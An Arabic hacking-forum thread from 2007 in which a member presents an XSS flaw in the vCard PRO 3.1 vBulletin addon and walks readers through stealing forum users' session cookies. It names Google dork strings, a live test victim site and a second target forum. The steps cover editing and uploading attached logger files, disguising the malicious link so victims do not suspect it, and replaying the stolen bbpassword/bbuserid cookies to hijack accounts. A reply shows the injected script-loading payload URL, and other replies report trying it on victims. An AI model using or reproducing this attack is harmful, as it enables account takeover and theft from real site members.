ضع اعلانك هنا

 ضع اعلانك هنا ضع اعلانك هنا منتديات بوابة الاسلام
التاريخ 2008-8-13 التاريخ 2008-8-15 ضع اعلانك هنا ضع اعلانك هنا
 
قديم 01-01-2007, 04:38 PM   #1 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي vBulletin vCard PRO XSS
السلام عليكم ورحمة الله

كيفكم خواني ان شاء الله بخير

نوع الثغره : XSS
السكربت المصاب : vCard PRO 3.1
كلمة البحث في قوقل : Powered by vCard PRO 3.1 ©2004
او Powered by vCard PRO 3.1
مكتشف الثغره : XP

الملفات المصابه
gbrowse.php
toprated.php
create.php
jgb.php
index.php

سكربت البطاقات vCard PRO 3.1

الثغره تسحب الكوكز

فار تجارب http://www.albatoul.net


الثغره الثانيه في منتدى ياحسين تسحب كوكز اعضاء المنتدى


استثمار الثغرتين نفس طريقة الهوت ميل

في البداية نسجل في فار التجارب منتدى ياحسين

بعد التسجيل نحمل الملف المرفق

تحصل فيه الملفات التاليه

index.php
xp.js
xp.gif
xp.php

(( الخطوه الاولى ))

index.php افتح الملف بواسطة المفكره وغير http://www.alm3refh.com/vb الى رابط الموقع الي راح ترفع عليه الملفات

(( الخطوه الثانيه ))

xp.js افتح الملف بواسطة المفكره وغير فيه
كود:
http://www.alm3refh.com/vb
حط رابط مسار الموقع الي راح ترفعه عليه

(( الخطوه الثالثه ))


xp.php : افتح الملف بواسطة المفكره وغير الاميل + رابط الموضوع
http://www.yahosein.com/vb/showthread.php?t=69548
حط رابط اي موضوع في المنتدى ياحسين علشان لما يفتح الضحيه رابط الوج يحول عليه


الان ارفع المجلد vb كامل مع الملفات الى موقعك

ودخل منتدى ياحسين وفتح موضوع جديد في قسم الشكاوي

وكتب مثلا شكوى على موضوع وحط رابط الوج الي رفعته مثال
http://www.alm3refh.com/vb

طبعا تقدر تحط وصله موضوع ورتباط له علشان مايشك و يقول ايش دخل هذا ارابط

راح يجيك الكوكز طبعا اربع جداول

الي هم

bblastvisit
bblastactivity
bbpassword
bbuserid

http://www.powow.com/alm3refh1/pro/Opera.zip
http://www.opera.com/download
حمل متصفح اوبرا او اي محرر كوكز وسجل دخولك في المنتدى وحرر الكوكز حط كوكز الضحيه بدل كوكزك وسو فرش تحصل نفسك داخل بسمه


وعذروني على الختصار الشرح

(((( جميع الحقوق محفوضه لمنتديات عالم المعرفة ))))
الملفات المرفقة
نوع الملف: zip vCard.zip‏ (1.7 كيلوبايت, المشاهدات 137)
نوع الملف: zip vb-yahosein.zip‏ (1.8 كيلوبايت, المشاهدات 91)

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
التعديل الأخير تم بواسطة XP ; 02-28-2007 الساعة 09:29 PM.
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-01-2007, 05:22 PM   #2 (permalink)

::فريق عالم المعرفة::
 
الصورة الرمزية ShOoT3R






ShOoT3R غير متصل

ShOoT3R has a spectacular aura aboutShOoT3R has a spectacular aura about

افتراضي مشاركة: vBulletin vCard PRO XSS
يسلمواا استاذى العزيز

على الثغرة الراائعة

ومبروووك الاكتشاف

خخخخخخخخخخخخخخخخخ
خخخخخخخخخخخخخخخخخخخخخخخ

وبجرب على فئران التجارب خخخخخخخخخخخخخخخخ


يسلموااا استاذى

هكووور

التوقيع




ـــــــــــــــــــــــــــــــــ
(( اللهم ارحم المسلمين
والمسلمات الاحياء منهم والاموات ))


شروط التسجيل والمشاركة في المنتدى
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-01-2007, 05:24 PM   #3 (permalink)
عضو نشيط







OsamaPs غير متصل

OsamaPs will become famous soon enoughOsamaPs will become famous soon enough

افتراضي مشاركة: vBulletin vCard PRO XSS
و عليكم السلام و رحمة الله و بركاته
يعطيك العافية
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-01-2007, 07:05 PM   #4 (permalink)
عضو جديد






sad-m00n غير متصل

sad-m00n will become famous soon enoughsad-m00n will become famous soon enough

افتراضي مشاركة: vBulletin vCard PRO XSS
ماشاء الله عليك ..
فنــــان

لكـــن اغلب المواقع عربيــة ..
اتمنى من الأخوان توخي الحذر ..

لكــن عندي سؤال ...

"طبعا تقدر تحط وصله موضوع ورتباط له علشان مايشك و يقول ايش دخل هذا ارابط"
مافهمت كيف نربطهم عشان مايشك ..!!


تحــياتي
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-01-2007, 07:14 PM   #5 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي مشاركة: vBulletin vCard PRO XSS
يسلمو خواني على المرور

اخوي sad-m00n طريقة اربط اقصد فيها تخدعه بلوصله مثال رابط هذا الموضوع

http://www.alm3refh.com/vb/showthread.php?p=46655

لما تضغط عليه يوديك قوقل وشكله موضوع في المنتدى علشان مايشك بدل قول تحط وصلتك الملغومه

طبعا لما يحول لملف الوج ويرسل لك الكوكز راح يحول على الموضوع الي في الملف xp.php

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-01-2007, 07:27 PM   #6 (permalink)
عضو جديد






sad-m00n غير متصل

sad-m00n will become famous soon enoughsad-m00n will become famous soon enough

افتراضي مشاركة: vBulletin vCard PRO XSS
اهـــاا

لا ماشاء الله شرحك كامل ولكمال الله ...
تحــياتي لإبداعـــك عزيز ...
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-01-2007, 09:59 PM   #7 (permalink)
عضو جديد






sad-m00n غير متصل

sad-m00n will become famous soon enoughsad-m00n will become famous soon enough

افتراضي مشاركة: vBulletin vCard PRO XSS
Database error in vCard PRO:
INVALID SQL: SELECT cd.*, ct.cat_name
FROM vcard_category AS ct
LEFT JOIN vcard_cards AS cd ON (cd.cat_id=ct.cat_id)
WHERE ct.cat_active=1 AND cd.card_rating>0
GROUP BY cd.card_rating,cd.card_id
ORDER BY cd.card_rating DESC, cd.card_nvotes DESC LIMIT -9, 9
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-9, 9' at line 6
mysql error number: 1064
Date: 2007/01/01 - 08:26:58 PM


ممممم .. هذا غلــط حصــل معي ..!!
علمــا اني تاكدت من الخطوات تمام ..

وشكــــرا
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-02-2007, 04:07 AM   #8 (permalink)
عضو نشيط






" الخــــيـــال " غير متصل

" الخــــيـــال " will become famous soon enough" الخــــيـــال " will become famous soon enough

افتراضي مشاركة: vBulletin vCard PRO XSS
حدث معي ايضا هذا الخطأ كل الخطوات عملتها صح

Database error in vCard PRO:
INVALID SQL: SELECT cd.*, ct.cat_name
FROM vcard_category AS ct
LEFT JOIN vcard_cards AS cd ON (cd.cat_id=ct.cat_id)
WHERE ct.cat_active=1 AND cd.card_rating>0
GROUP BY cd.card_rating,cd.card_id
ORDER BY cd.card_rating DESC, cd.card_nvotes DESC LIMIT -9, 9
mysql error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-9, 9' at line 6
mysql error number: 1064
Date: 2007/01/02 - 01:03:56 AM
Script: /vc/toprated.php?page=%3C/script%3E%20%22%3E%3Cscript%20src%3Dhttp%3A//www.********.com/vbxp.js%3E%3C/script%3E
Referer:
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-02-2007, 09:58 AM   #9 (permalink)
XP

:: فريق عالم المعرفة::
 
الصورة الرمزية XP








XP غير متصل

XP has a spectacular aura aboutXP has a spectacular aura aboutXP has a spectacular aura about

افتراضي مشاركة: vBulletin vCard PRO XSS
اخوي sad-m00n و الخــــيـــال تأكدو من التعديل في ملف الادكست انه صحيح وطريقة استبدال رابط الموقع المصاب

التوقيع

(*) من سب صحابتي فعليه لعنة اللَّه والملائكة والناس أجمعين(*)
رواه الطبراني وهو في سلسلة الألباني الصحيحة

دعاءالشيخ خميس الزهراني

شروط التسجيل والكتابة في المنتدى

موضوع خطيرر تفضل بدخول

(اللهم أرزقنا قبل الموت توبه .. وعند الموت شهاده )

مركز تحميل الصور
 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
 
قديم 01-02-2007, 10:39 AM   #10 (permalink)
عضو فعال
 
الصورة الرمزية NightMare






NightMare غير متصل

NightMare will become famous soon enoughNightMare will become famous soon enough

Wink مشاركة: vBulletin vCard PRO XSS
يسلموووو ثغره حيل حلوة وفعالة
بس ماانقدر نغير بيانات التسجيل للعضويه الي نصيدها
كالباس والايميل لازم الباس القديم
ويعطيك العافية عالشرح

التوقيع

 
Digg this Post!Add Post to del.icio.usBookmark Post in TechnoratiFurl this Post!
رد مع اقتباس
 
إضافة رد
صفحة 1 من 4 1 23 > الأخيرة »

vBulletin vCard PRO XSS

ثغرات أعضاء المنتدى



« الموضوع السابق | الموضوع التالي »


الذين يشاهدون محتوى الموضوع الآن : 1 ( الأعضاء 0 والزوار 1)
 
أدوات الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك
BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are معطلة
Pingbacks are معطلة
Refbacks are متاحة


الساعة الآن 01:02 PM.

عدد الكلمات الدلالية 70 الاكثر بحث في الموقع
الكلمات الدلالية
اخبار ادوات اطفال الاستثمار البرفست البيزون الدروس الروافض السعوديه السنه الشيعه العاب الفلاش الفوتو شوب الكويت المجوس المهدي الهكر ايران برامج برامج اختراق برامج هكر بنات تحميل تشفير تشقير الصفحات تطوير تعليم ثغره جرائم جوال حماية حوار دروس دومين رواتر شرح صميم صوره فضائح فيديو كتاب كراك كمبيوتر محاضرات منتدى مودم نطاق نوكيا هوز bifrost buffer crypter domain downloader exploit file inclusion iran local overflow password poison python server shellcode sql injection trojan version vulnerability youtube


روابط مهمة

أقسام المنتدى

الرسول الإنسان | الدفاع عن أهل السنة | فضائح و جرائم الروافض | السنه | الحوارات الهادفة | الفلاش والسويتش | الفوتوشوب | دورة الفوتوشوب | صور | العاب | البرامج المشروحه | الفرفشه والمرح | الرياضة | الفايروسات | الهاردوير والصيانة | تطوير المنتديات والمواقع | دورة تطوير منتديات vb | الحمايه | اختراق المواقع والسيرفرات | هكرز | اختراق الشات والاميل | ثغرات | البرامج